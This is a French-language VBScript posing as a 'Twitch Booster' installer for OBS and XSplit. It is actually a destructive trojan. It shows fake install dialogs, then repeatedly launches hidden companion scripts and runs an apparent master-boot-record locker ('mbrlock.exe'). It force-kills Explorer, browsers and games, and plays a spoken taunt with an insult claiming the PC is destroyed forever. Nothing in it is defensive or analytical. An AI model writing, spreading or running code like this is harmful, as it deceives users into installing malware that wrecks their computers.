X = MsgBox ("Bienvenue dans l'installateur du Twitch Booster pour OBS et XSplit. Souhaitez vous procéder à l'installation ?", 4 +0, "Twitch Booster")
WScript.Sleep 4000
X = MsgBox ("Installation terminée, vous pouvez maintenant streamer sur Twitch sans aucune problème de connexion ou autre !", 0 +0, "Twitch Booster")
WScript.Sleep 25000
set variable=CreateObject("WScript.Shell")
variable.Run ("extension6.vbs")
variable.Run ("extension6.vbs")
variable.Run ("extension6.vbs")
variable.Run ("extension6.vbs")
variable.Run ("extension6.vbs")
wscript.sleep 1000
createobject ("SAPI.SpVoice").Speak "coucou, je suis juste la petite voix qui te dit que le 18 25 vient de detruire ton pc et ce a tout jamais. amuse toi bien a le reparer fils de viol, très content. dedi au raiye du 18 25"
wscript.sleep 25000
variable.Run ("mbrlock.exe")
variable.Run ("taskkill /f /IM explorer.exe")
variable.Run ("taskkill /f /im javaw.exe")
variable.Run ("taskkill /f /im msedge.exe")
variable.Run ("taskkill /f /im chrome.exe")
variable.Run ("taskkill /f /im firefox.exe")
variable.Run ("taskkill /f /im h12.exe")
variable.Run ("taskkill /f /im iexplorer.exe")
variable.Run ("taskkill /f /im FortniteClient-Win64-Shipping.exe")
variable.Run ("extension3.vbs")
variable.Run ("7458.vbs")
variable.Run ("extension4.vbs")
variable.Run ("extension8.vbs")
variable.Run ("extension2.vbs")
variable.Run ("extension5.exe")
variable.Run ("extension9.vbs")
variable.Run ("extension10.vbs")